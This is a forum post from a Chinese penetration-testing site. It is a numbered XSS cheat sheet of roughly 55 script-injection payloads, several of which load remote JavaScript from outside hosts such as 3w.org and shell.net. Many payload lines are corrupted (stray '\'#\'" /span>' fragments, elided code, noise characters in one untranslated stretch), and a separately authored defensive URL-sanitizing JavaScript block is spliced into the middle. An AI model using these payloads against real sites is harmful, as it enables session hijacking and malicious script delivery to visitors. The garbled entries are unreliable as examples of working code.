中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: XSS Attack Summary

Author: admin    Time: 2016-4-28 10:06
Title: XSS Attack Summary
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>


(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) IMG tag with corrected defect
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..省略..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..省略..S')>


(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective in China, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">
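As an added defender-side example (not part of the original post): the check below normalizes a URL-bearing attribute value the way a browser effectively does, then validates the scheme against an allow-list. That normalization is what defeats the case, entity-encoding, whitespace and NUL variants in items (3) through (19); the function names, allow-list and sample values are my own.

```javascript
// Added example, not from the original post: normalize an attribute value, then
// allow-list its scheme. Each step neutralizes one evasion class listed above:
// entity decoding with or without a trailing semicolon (5, 8-10), embedded
// tab/newline/CR (11-14), leading whitespace and control chars (19), NUL bytes
// (17-18) and mixed case (4). Only the scheme is validated here.

const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", tab: "\t", newline: "\n" };

// Single-pass decode of &#NNN; &#xHH; and a few named entities. The semicolon
// is optional, which is exactly why the "no semicolon" variants still work.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === "#") {
      const cp = body[1].toLowerCase() === "x" ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    return NAMED_ENTITIES[body.toLowerCase()] ?? m;
  });
}

// Browsers drop tab/newline/CR anywhere in a URL and leading/trailing controls
// before reading the scheme. Stripping the whole C0 range plus space is stricter
// than the WHATWG parser, which is fine for a check (it also covers "java\0script").
function normalizeUrl(raw) {
  return decodeEntities(raw).replace(/[\u0000-\u0020]/g, "").toLowerCase();
}

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// True for relative URLs and for absolute URLs with an allow-listed scheme.
// Deny-listing "javascript:" is the mistake every item above exploits;
// allow-listing schemes is the durable fix.
function isSafeUrlAttribute(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normalizeUrl(raw));
  if (!m) return true; // no scheme at all: relative URL
  return ALLOWED_SCHEMES.has(m[1]);
}

// Constructed sample values (not taken from the post) to show both outcomes.
const SAMPLES = ["/img/logo.png", "http://example.com/a.png", "JaVaScRiPt:alert(1)", "jav&#x09;ascript:alert(1)"];
for (const s of SAMPLES) console.log(JSON.stringify(s), "->", isSafeUrlAttribute(s) ? "allowed" : "rejected");
```

Percent-encoding is deliberately not decoded, because browsers do not percent-decode the scheme either; protocol-relative URLs (`//host/...`) pass the scheme check and need a separate host policy if that matters to you.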

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

0 |) T9 P% V& V7 z; g  z* B- {' {7 D(23)双开括号/ F3 g" d. f- A  r- D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
5 @" {8 s- a" ?. L
0 {4 v: m) _% c' u; {- b# e(24)无结束脚本标记(仅火狐等浏览器); ?2 |8 N; H5 @# }" `! h
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' B& R1 p" i( X* e7 @/ c. `  l

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2